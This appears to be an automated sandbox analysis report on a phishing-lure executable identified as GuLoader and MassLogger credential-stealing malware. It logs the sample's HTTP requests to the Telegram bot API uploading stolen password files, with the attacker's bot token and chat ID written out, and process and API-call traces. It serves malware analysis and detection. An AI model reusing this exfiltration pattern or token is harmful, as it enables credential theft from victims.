                                                                                                                              2024-12-03 14:23:55 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":994,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235835,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.749978149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:58 UTC299OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd168945128f1d
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-03 14:23:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 36 38 39 34 35 31 32 38 66 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd168945128f1dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:59 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:59 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:59 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":995,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235839,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.749980149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:24:04 UTC299OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd16f8012457e7
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-03 14:24:04 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 36 66 38 30 31 32 34 35 37 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd16f8012457e7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:24:05 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:24:05 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:24:05 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":996,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235845,"document":{"file_nam


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:5
                                                                                                                              Start time:09:21:55
                                                                                                                              Start date:03/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:734'480 bytes
                                                                                                                              MD5 hash:143EDB6C5C1E1A1E06695965F2B5CB74
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1644205426.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:10
                                                                                                                              Start time:10:37:25
                                                                                                                              Start date:03/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:734'480 bytes
                                                                                                                              MD5 hash:143EDB6C5C1E1A1E06695965F2B5CB74
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:20.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:15.2%
                                                                                                                                Signature Coverage:18.9%
                                                                                                                                Total number of Nodes:1510
                                                                                                                                Total number of Limit Nodes:45
                                                                                                                                execution_graph 4980 10001000 4983 1000101b 4980->4983 4990 1000152e 4983->4990 4985 10001020 4986 10001024 4985->4986 4987 10001027 GlobalAlloc 4985->4987 4988 10001555 3 API calls 4986->4988 4987->4986 4989 10001019 4988->4989 4991 10001243 3 API calls 4990->4991 4992 10001534 4991->4992 4993 1000153a 4992->4993 4994 10001546 GlobalFree 4992->4994 4993->4985 4994->4985 4995 401d41 GetDC GetDeviceCaps 4996 402b1d 18 API calls 4995->4996 4997 401d5f MulDiv ReleaseDC 4996->4997 4998 402b1d 18 API calls 4997->4998 4999 401d7e 4998->4999 5000 405f0c 18 API calls 4999->5000 5001 401db7 CreateFontIndirectW 5000->5001 5002 4024e8 5001->5002 5003 401a42 5004 402b1d 18 API calls 5003->5004 5005 401a48 5004->5005 5006 402b1d 18 API calls 5005->5006 5007 4019f0 5006->5007 5008 404243 lstrcpynW lstrlenW 5009 402746 5010 402741 5009->5010 5010->5009 5011 402756 FindNextFileW 5010->5011 5012 4027a8 5011->5012 5014 402761 5011->5014 5015 405eea lstrcpynW 5012->5015 5015->5014 5016 401cc6 5017 402b1d 18 API calls 5016->5017 5018 401cd9 SetWindowLongW 5017->5018 5019 4029c7 5018->5019 4136 401dc7 4144 402b1d 4136->4144 4138 401dcd 4139 402b1d 18 API calls 4138->4139 4140 401dd6 4139->4140 4141 401de8 EnableWindow 4140->4141 4142 401ddd ShowWindow 4140->4142 4143 4029c7 4141->4143 4142->4143 4145 405f0c 18 API calls 4144->4145 4146 402b31 4145->4146 4146->4138 5027 4045ca 5028 4045f6 5027->5028 5029 404607 5027->5029 5088 4056aa GetDlgItemTextW 5028->5088 5031 404613 GetDlgItem 5029->5031 5037 404672 5029->5037 5033 404627 5031->5033 5032 404601 5035 40617e 5 API calls 5032->5035 5036 40463b SetWindowTextW 5033->5036 5041 4059e0 4 API calls 5033->5041 5034 404756 5038 4048f7 5034->5038 5090 4056aa GetDlgItemTextW 5034->5090 5035->5029 5042 40412f 19 API calls 5036->5042 5037->5034 5037->5038 5043 405f0c 18 API calls 5037->5043 5040 404196 8 API calls 5038->5040 5045 40490b 5040->5045 5046 404631 5041->5046 5047 404657 5042->5047 5048 4046e6 SHBrowseForFolderW 5043->5048 5044 404786 5049 405a3d 18 API calls 5044->5049 5046->5036 5055 405935 3 API calls 5046->5055 5050 40412f 19 API calls 5047->5050 5048->5034 5051 4046fe CoTaskMemFree 5048->5051 5052 40478c 5049->5052 5053 404665 5050->5053 5054 405935 3 API calls 5051->5054 5091 405eea lstrcpynW 5052->5091 5089 404164 SendMessageW 5053->5089 5057 40470b 5054->5057 5055->5036 5060 404742 SetDlgItemTextW 5057->5060 5064 405f0c 18 API calls 5057->5064 5059 40466b 5062 406254 3 API calls 5059->5062 5060->5034 5061 4047a3 5063 406254 3 API calls 5061->5063 5062->5037 5071 4047ab 5063->5071 5065 40472a lstrcmpiW 5064->5065 5065->5060 5068 40473b lstrcatW 5065->5068 5066 4047ea 5092 405eea lstrcpynW 5066->5092 5068->5060 5069 4047f1 5070 4059e0 4 API calls 5069->5070 5072 4047f7 GetDiskFreeSpaceW 5070->5072 5071->5066 5075 405981 2 API calls 5071->5075 5077 40483c 5071->5077 5074 40481a MulDiv 5072->5074 5072->5077 5074->5077 5075->5071 5076 4048a6 5079 4048c9 5076->5079 5081 40140b 2 API calls 5076->5081 5077->5076 5078 404978 21 API calls 5077->5078 5080 404898 5078->5080 5093 404151 EnableWindow 5079->5093 5082 4048a8 SetDlgItemTextW 5080->5082 5083 40489d 5080->5083 5081->5079 5082->5076 5086 404978 21 API calls 5083->5086 5085 4048e5 5085->5038 5094 40455f 5085->5094 5086->5076 5088->5032 5089->5059 5090->5044 5091->5061 5092->5069 5093->5085 5095 404572 SendMessageW 5094->5095 5096 40456d 5094->5096 5095->5038 5096->5095 5097 401bca 5098 402b1d 18 API calls 5097->5098 5099 401bd1 5098->5099 5100 402b1d 18 API calls 5099->5100 5101 401bdb 5100->5101 5102 401beb 5101->5102 5104 402b3a 18 API calls 5101->5104 5103 401bfb 5102->5103 5105 402b3a 18 API calls 5102->5105 5106 401c06 5103->5106 5107 401c4a 5103->5107 5104->5102 5105->5103 5108 402b1d 18 API calls 5106->5108 5109 402b3a 18 API calls 5107->5109 5110 401c0b 5108->5110 5111 401c4f 5109->5111 5112 402b1d 18 API calls 5110->5112 5113 402b3a 18 API calls 5111->5113 5115 401c14 5112->5115 5114 401c58 FindWindowExW 5113->5114 5118 401c7a 5114->5118 5116 401c3a SendMessageW 5115->5116 5117 401c1c SendMessageTimeoutW 5115->5117 5116->5118 5117->5118 5119 40194b 5120 402b1d 18 API calls 5119->5120 5121 401952 5120->5121 5122 402b1d 18 API calls 5121->5122 5123 40195c 5122->5123 5124 402b3a 18 API calls 5123->5124 5125 401965 5124->5125 5126 401979 lstrlenW 5125->5126 5127 4019b5 5125->5127 5128 401983 5126->5128 5128->5127 5132 405eea lstrcpynW 5128->5132 5130 40199e 5130->5127 5131 4019ab lstrlenW 5130->5131 5131->5127 5132->5130 5136 4042cc 5138 4043fe 5136->5138 5139 4042e4 5136->5139 5137 404468 5140 404472 GetDlgItem 5137->5140 5141 40453a 5137->5141 5138->5137 5138->5141 5145 404439 GetDlgItem SendMessageW 5138->5145 5142 40412f 19 API calls 5139->5142 5143 4044fb 5140->5143 5144 40448c 5140->5144 5147 404196 8 API calls 5141->5147 5146 40434b 5142->5146 5143->5141 5148 40450d 5143->5148 5144->5143 5152 4044b2 6 API calls 5144->5152 5167 404151 EnableWindow 5145->5167 5150 40412f 19 API calls 5146->5150 5151 404535 5147->5151 5153 404523 5148->5153 5154 404513 SendMessageW 5148->5154 5156 404358 CheckDlgButton 5150->5156 5152->5143 5153->5151 5157 404529 SendMessageW 5153->5157 5154->5153 5155 404463 5158 40455f SendMessageW 5155->5158 5165 404151 EnableWindow 5156->5165 5157->5151 5158->5137 5160 404376 GetDlgItem 5166 404164 SendMessageW 5160->5166 5162 40438c SendMessageW 5163 4043b2 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5162->5163 5164 4043a9 GetSysColor 5162->5164 5163->5151 5164->5163 5165->5160 5166->5162 5167->5155 5168 4024cc 5169 402b3a 18 API calls 5168->5169 5170 4024d3 5169->5170 5173 405b56 GetFileAttributesW CreateFileW 5170->5173 5172 4024df 5173->5172 4207 1000278d 4208 100027dd 4207->4208 4209 1000279d VirtualProtect 4207->4209 4209->4208 5174 4019cf 5175 402b3a 18 API calls 5174->5175 5176 4019d6 5175->5176 5177 402b3a 18 API calls 5176->5177 5178 4019df 5177->5178 5179 4019e6 lstrcmpiW 5178->5179 5180 4019f8 lstrcmpW 5178->5180 5181 4019ec 5179->5181 5180->5181 4293 401e51 4294 402b3a 18 API calls 4293->4294 4295 401e57 4294->4295 4296 405194 25 API calls 4295->4296 4297 401e61 4296->4297 4311 405665 CreateProcessW 4297->4311 4300 401ec6 CloseHandle 4304 402793 4300->4304 4301 401e77 WaitForSingleObject 4302 401e89 4301->4302 4303 401e9b GetExitCodeProcess 4302->4303 4314 40628d 4302->4314 4305 401eba 4303->4305 4306 401ead 4303->4306 4305->4300 4309 401eb8 4305->4309 4318 405e31 wsprintfW 4306->4318 4309->4300 4312 401e67 4311->4312 4313 405694 CloseHandle 4311->4313 4312->4300 4312->4301 4312->4304 4313->4312 4315 4062aa PeekMessageW 4314->4315 4316 4062a0 DispatchMessageW 4315->4316 4317 401e90 WaitForSingleObject 4315->4317 4316->4315 4317->4302 4318->4309 4393 401752 4394 402b3a 18 API calls 4393->4394 4395 401759 4394->4395 4396 401781 4395->4396 4397 401779 4395->4397 4434 405eea lstrcpynW 4396->4434 4433 405eea lstrcpynW 4397->4433 4400 40177f 4404 40617e 5 API calls 4400->4404 4401 40178c 4402 405935 3 API calls 4401->4402 4403 401792 lstrcatW 4402->4403 4403->4400 4421 40179e 4404->4421 4405 40622d 2 API calls 4405->4421 4406 4017da 4407 405b31 2 API calls 4406->4407 4407->4421 4409 4017b0 CompareFileTime 4409->4421 4410 401870 4412 405194 25 API calls 4410->4412 4411 401847 4414 405194 25 API calls 4411->4414 4431 40185c 4411->4431 4413 40187a 4412->4413 4416 403062 46 API calls 4413->4416 4414->4431 4415 405eea lstrcpynW 4415->4421 4417 40188d 4416->4417 4418 4018a1 SetFileTime 4417->4418 4420 4018b3 CloseHandle 4417->4420 4418->4420 4419 405f0c 18 API calls 4419->4421 4422 4018c4 4420->4422 4420->4431 4421->4405 4421->4406 4421->4409 4421->4410 4421->4411 4421->4415 4421->4419 4427 4056c6 MessageBoxIndirectW 4421->4427 4432 405b56 GetFileAttributesW CreateFileW 4421->4432 4423 4018c9 4422->4423 4424 4018dc 4422->4424 4425 405f0c 18 API calls 4423->4425 4426 405f0c 18 API calls 4424->4426 4428 4018d1 lstrcatW 4425->4428 4429 4018e4 4426->4429 4427->4421 4428->4429 4430 4056c6 MessageBoxIndirectW 4429->4430 4430->4431 4432->4421 4433->4400 4434->4401 4435 402253 4436 402261 4435->4436 4437 40225b 4435->4437 4438 40226f 4436->4438 4440 402b3a 18 API calls 4436->4440 4439 402b3a 18 API calls 4437->4439 4441 402b3a 18 API calls 4438->4441 4443 40227d 4438->4443 4439->4436 4440->4438 4441->4443 4442 402b3a 18 API calls 4444 402286 WritePrivateProfileStringW 4442->4444 4443->4442 5182 4052d3 5183 4052f4 GetDlgItem GetDlgItem GetDlgItem 5182->5183 5184 40547f 5182->5184 5227 404164 SendMessageW 5183->5227 5185 4054b0 5184->5185 5186 405488 GetDlgItem CreateThread CloseHandle 5184->5186 5189 4054db 5185->5189 5190 405500 5185->5190 5191 4054c7 ShowWindow ShowWindow 5185->5191 5186->5185 5188 405365 5193 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 5188->5193 5192 40553b 5189->5192 5195 405515 ShowWindow 5189->5195 5196 4054ef 5189->5196 5197 404196 8 API calls 5190->5197 5229 404164 SendMessageW 5191->5229 5192->5190 5200 405549 SendMessageW 5192->5200 5198 4053db 5193->5198 5199 4053bf SendMessageW SendMessageW 5193->5199 5202 405535 5195->5202 5203 405527 5195->5203 5201 404108 SendMessageW 5196->5201 5208 40550e 5197->5208 5205 4053e0 SendMessageW 5198->5205 5206 4053ee 5198->5206 5199->5198 5207 405562 CreatePopupMenu 5200->5207 5200->5208 5201->5190 5204 404108 SendMessageW 5202->5204 5209 405194 25 API calls 5203->5209 5204->5192 5205->5206 5211 40412f 19 API calls 5206->5211 5210 405f0c 18 API calls 5207->5210 5209->5202 5212 405572 AppendMenuW 5210->5212 5213 4053fe 5211->5213 5214 4055a2 TrackPopupMenu 5212->5214 5215 40558f GetWindowRect 5212->5215 5216 405407 ShowWindow 5213->5216 5217 40543b GetDlgItem SendMessageW 5213->5217 5214->5208 5218 4055bd 5214->5218 5215->5214 5219 40542a 5216->5219 5220 40541d ShowWindow 5216->5220 5217->5208 5221 405462 SendMessageW SendMessageW 5217->5221 5222 4055d9 SendMessageW 5218->5222 5228 404164 SendMessageW 5219->5228 5220->5219 5221->5208 5222->5222 5223 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5222->5223 5225 40561b SendMessageW 5223->5225 5225->5225 5226 405644 GlobalUnlock SetClipboardData CloseClipboard 5225->5226 5226->5208 5227->5188 5228->5217 5229->5189 5230 402454 5231 402c44 19 API calls 5230->5231 5232 40245e 5231->5232 5233 402b1d 18 API calls 5232->5233 5234 402467 5233->5234 5235 40248b RegEnumValueW 5234->5235 5236 40247f RegEnumKeyW 5234->5236 5238 402793 5234->5238 5237 4024a4 RegCloseKey 5235->5237 5235->5238 5236->5237 5237->5238 5240 401ed4 5241 402b3a 18 API calls 5240->5241 5242 401edb 5241->5242 5243 40622d 2 API calls 5242->5243 5244 401ee1 5243->5244 5246 401ef2 5244->5246 5247 405e31 wsprintfW 5244->5247 5247->5246 5248 4022d5 5249 402305 5248->5249 5250 4022da 5248->5250 5251 402b3a 18 API calls 5249->5251 5252 402c44 19 API calls 5250->5252 5253 40230c 5251->5253 5254 4022e1 5252->5254 5259 402b7a RegOpenKeyExW 5253->5259 5255 402b3a 18 API calls 5254->5255 5258 402322 5254->5258 5256 4022f2 RegDeleteValueW RegCloseKey 5255->5256 5256->5258 5266 402ba5 5259->5266 5268 402bf1 5259->5268 5260 402bcb RegEnumKeyW 5261 402bdd RegCloseKey 5260->5261 5260->5266 5263 406254 3 API calls 5261->5263 5262 402c02 RegCloseKey 5262->5268 5265 402bed 5263->5265 5264 402b7a 3 API calls 5264->5266 5267 402c1d RegDeleteKeyW 5265->5267 5265->5268 5266->5260 5266->5261 5266->5262 5266->5264 5267->5268 5268->5258 4458 403c57 4459 403daa 4458->4459 4460 403c6f 4458->4460 4462 403dfb 4459->4462 4463 403dbb GetDlgItem GetDlgItem 4459->4463 4460->4459 4461 403c7b 4460->4461 4464 403c86 SetWindowPos 4461->4464 4465 403c99 4461->4465 4467 403e55 4462->4467 4472 401389 2 API calls 4462->4472 4466 40412f 19 API calls 4463->4466 4464->4465 4469 403cb6 4465->4469 4470 403c9e ShowWindow 4465->4470 4471 403de5 SetClassLongW 4466->4471 4468 40417b SendMessageW 4467->4468 4490 403da5 4467->4490 4497 403e67 4468->4497 4473 403cd8 4469->4473 4474 403cbe DestroyWindow 4469->4474 4470->4469 4475 40140b 2 API calls 4471->4475 4476 403e2d 4472->4476 4478 403cdd SetWindowLongW 4473->4478 4479 403cee 4473->4479 4477 4040d9 4474->4477 4475->4462 4476->4467 4482 403e31 SendMessageW 4476->4482 4488 4040e9 ShowWindow 4477->4488 4477->4490 4478->4490 4480 403d97 4479->4480 4481 403cfa GetDlgItem 4479->4481 4487 404196 8 API calls 4480->4487 4485 403d2a 4481->4485 4486 403d0d SendMessageW IsWindowEnabled 4481->4486 4482->4490 4483 40140b 2 API calls 4483->4497 4484 4040ba DestroyWindow EndDialog 4484->4477 4489 403d2f 4485->4489 4492 403d37 4485->4492 4493 403d7e SendMessageW 4485->4493 4494 403d4a 4485->4494 4486->4485 4486->4490 4487->4490 4488->4490 4532 404108 4489->4532 4491 405f0c 18 API calls 4491->4497 4492->4489 4492->4493 4493->4480 4498 403d52 4494->4498 4499 403d67 4494->4499 4496 40412f 19 API calls 4496->4497 4497->4483 4497->4484 4497->4490 4497->4491 4497->4496 4504 40412f 19 API calls 4497->4504 4519 403ffa DestroyWindow 4497->4519 4502 40140b 2 API calls 4498->4502 4501 40140b 2 API calls 4499->4501 4500 403d65 4500->4480 4503 403d6e 4501->4503 4502->4489 4503->4480 4503->4489 4505 403ee2 GetDlgItem 4504->4505 4506 403ef7 4505->4506 4507 403eff ShowWindow KiUserCallbackDispatcher 4505->4507 4506->4507 4529 404151 EnableWindow 4507->4529 4509 403f29 EnableWindow 4512 403f3d 4509->4512 4510 403f42 GetSystemMenu EnableMenuItem SendMessageW 4511 403f72 SendMessageW 4510->4511 4510->4512 4511->4512 4512->4510 4530 404164 SendMessageW 4512->4530 4531 405eea lstrcpynW 4512->4531 4515 403fa0 lstrlenW 4516 405f0c 18 API calls 4515->4516 4517 403fb6 SetWindowTextW 4516->4517 4518 401389 2 API calls 4517->4518 4518->4497 4519->4477 4520 404014 CreateDialogParamW 4519->4520 4520->4477 4521 404047 4520->4521 4522 40412f 19 API calls 4521->4522 4523 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4522->4523 4524 401389 2 API calls 4523->4524 4525 404098 4524->4525 4525->4490 4526 4040a0 ShowWindow 4525->4526 4527 40417b SendMessageW 4526->4527 4528 4040b8 4527->4528 4528->4477 4529->4509 4530->4512 4531->4515 4533 404115 SendMessageW 4532->4533 4534 40410f 4532->4534 4533->4500 4534->4533 5269 4014d7 5270 402b1d 18 API calls 5269->5270 5271 4014dd Sleep 5270->5271 5273 4029c7 5271->5273 4761 40335a #17 SetErrorMode OleInitialize 4762 406254 3 API calls 4761->4762 4763 40339d SHGetFileInfoW 4762->4763 4834 405eea lstrcpynW 4763->4834 4765 4033c8 GetCommandLineW 4835 405eea lstrcpynW 4765->4835 4767 4033da GetModuleHandleW 4768 4033f2 4767->4768 4769 405962 CharNextW 4768->4769 4770 403401 CharNextW 4769->4770 4780 403411 4770->4780 4771 4034e6 4772 4034fa GetTempPathW 4771->4772 4836 403326 4772->4836 4774 403512 4775 403516 GetWindowsDirectoryW lstrcatW 4774->4775 4776 40356c DeleteFileW 4774->4776 4778 403326 11 API calls 4775->4778 4844 402dbc GetTickCount GetModuleFileNameW 4776->4844 4777 405962 CharNextW 4777->4780 4781 403532 4778->4781 4780->4771 4780->4777 4784 4034e8 4780->4784 4781->4776 4783 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4781->4783 4782 403580 4785 403618 4782->4785 4789 403608 4782->4789 4792 405962 CharNextW 4782->4792 4788 403326 11 API calls 4783->4788 4928 405eea lstrcpynW 4784->4928 4931 4037c2 4785->4931 4791 403564 4788->4791 4874 4038b4 4789->4874 4791->4776 4791->4785 4794 40359b 4792->4794 4801 4035e2 4794->4801 4802 403647 lstrcatW lstrcmpiW 4794->4802 4795 403631 4797 4056c6 